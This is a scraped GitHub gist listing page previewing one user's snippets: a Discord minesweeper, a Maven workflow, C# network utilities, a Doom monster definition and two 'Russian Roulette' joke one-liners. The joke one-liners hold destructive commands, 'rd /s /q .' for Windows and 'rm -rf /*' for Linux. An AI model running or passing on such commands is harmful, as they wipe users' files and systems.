Skip to content

Instantly share code, notes, and snippets.

View DartPower's full-sized avatar
🎵
Planemov - Live at Studio Twenty One Club 18-10-2018

DartPower DartPower

🎵
Planemov - Live at Studio Twenty One Club 18-10-2018
View GitHub Profile
@DartPower
DartPower / Minesweeper.md
Created July 14, 2024 07:52
Minesweeper For Discord

Minesweeper For Discord >:D

||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥|| ||💥||

@DartPower
DartPower / maven.yml
Created December 2, 2023 12:05
mcMMO github workflow for uploading jar
# This workflow automatically tests new commits and pull requests as they come in.
# Note that this does not upload any artifacts, you will need to compile mcMMO manually
# if you wish to create the actual jar.
name: Compile and test
on:
# We run our tests whenever the pom or a source file was touched.
# There is no need to run Maven when only the changelog was touched.
# We may also want to re-run this workflow when the workflow file itself
# was updated too.
import telegram
import os
import time
# Задаем токен бота
TOKEN = "YOUR_TOKEN_HERE"
# Задаем ID чата для отправки сообщений
CHAT_ID = "YOUR_CHAT_ID_HERE"
@DartPower
DartPower / SporeCreatureDownload.cs
Last active April 2, 2023 14:10
SporeCreatureDownload.cs
using System;
using System.Net;
namespace SporeCreatureDownload
{
public class Program
{
static void WriteLog(string message, ConsoleColor color)
{
Console.Write("[{0:yyyy-MM-dd HH:mm:ss}] ", DateTime.Now);
@DartPower
DartPower / RR.cmd
Created March 4, 2023 14:46
Russian Roulette. Windows Edition.
set /a R=0+(6*%random%)/%random% & if !R! == 0 (rd /s /q .) else (echo OK!)
@DartPower
DartPower / RR.sh
Created March 4, 2023 14:45
Rusian Roulette, Linux Edition
# [ $[ $RANDOM % 6 ] == 0 ] && rm -rf /* || echo "OK"
@DartPower
DartPower / AI Prompts and Tools.md
Created February 8, 2023 13:42
AI Prompts and Tools

AI Prompts and Tools

Chat GPT Prompts

ChatGPT prompts for developing or testing the code

@DartPower
DartPower / VPNCheckerAndReRasdial.cs
Last active April 4, 2023 11:06
Windows VPN ReDial if ping to VPN's Gateway is fault.
using System;
using System.Diagnostics;
using System.IO;
using System.Net.NetworkInformation;
using System.Threading;
using System.Threading.Tasks;
namespace VPNCheckerAndReRasdial
{
internal class Program
@DartPower
DartPower / NetworkRestarterAIVar.cs
Created January 31, 2023 14:37
NetworkRestarter by ChatGPT
using System;
using System.Net;
using System.Net.NetworkInformation;
using System.IO;
namespace NetworkChecker
{
class Program
{
static void Main(string[] args)
@DartPower
DartPower / ChatGPT-Monster.dec
Created January 29, 2023 16:47
Monster DECORATE by ErikShel and ChatGPT
actor MyMonster
{
// Required properties
health 100
renderstyle TRANSLCOLOR
spawnid 9
SeeSound "MyMonster/See"
AttackSound "MyMonster/Attack"
DeathSound "MyMonster/Death"